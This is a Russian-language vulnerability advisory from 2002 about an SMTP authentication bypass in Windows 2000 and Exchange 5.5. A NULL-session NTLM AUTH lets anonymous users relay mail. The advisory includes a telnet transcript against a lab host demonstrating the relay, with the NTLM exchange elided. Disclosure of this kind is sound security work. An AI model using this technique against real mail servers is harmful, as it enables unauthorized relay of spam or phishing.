Обход аутентификации в SMTP для Microsoft Windows

Дата публикации:
04.03.2002
Всего просмотров:
1137
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Компонента SMTP для Microsoft Windows поддерживает команду SMTP AUTH. Команда предназначена для подтверждения подлинности пользователя себя используя NTLM оклик – отзыв (challenge-response). Однако, так как NTLM поддерживает использование нулевого сеанса, анонимный пользователь может использовать этот механизм, чтобы подтвердить подлинность в SMTP службе. Как только это произойдет, служба SMTP может использоваться для ретрансляции сообщений.
Уязвимость найдена в Microsoft Windows 2000, Microsoft Exchange Server 5.5


% telnet 192.168.8.129 25
Trying 192.168.8.129...
Connected to 192.168.8.129.
Escape character is '^]'.
220 w2ks.w2kvm.qnz.org Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at Wed, 29 Aug 2001 11:52:15 -0400
HELO foo
250 w2ks.w2kvm.qnz.org Hello [192.168.8.1]
MAIL From:<>
250 2.1.0 <>....Sender OK
RCPT To:<secure@microsoft.com>
550 5.7.1 Unable to relay for secure@microsoft.com
AUTH NTLM <etc, etc>
334 <etc, etc>
<etc, etc>
235 2.7.0 Authentication successfull
MAIL From:<>
503 5.5.2 Sender already specified
RCPT To:<secure@microsoft.com>
250 2.1.5 secure@microsoft.com
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Subject: your SMTP server supports null sessions

yada yada yada

.
250 2.6.0 <W2KShlQ6QpPpSML5liF00000001@w2ks.w2kvm.qnz.org> Queued mail for delivery QUIT 221 2.0.0 w2ks.w2kvm.qnz.org Service closing transmission channel Connection closed by foreign host.
 
или введите имя

CAPTCHA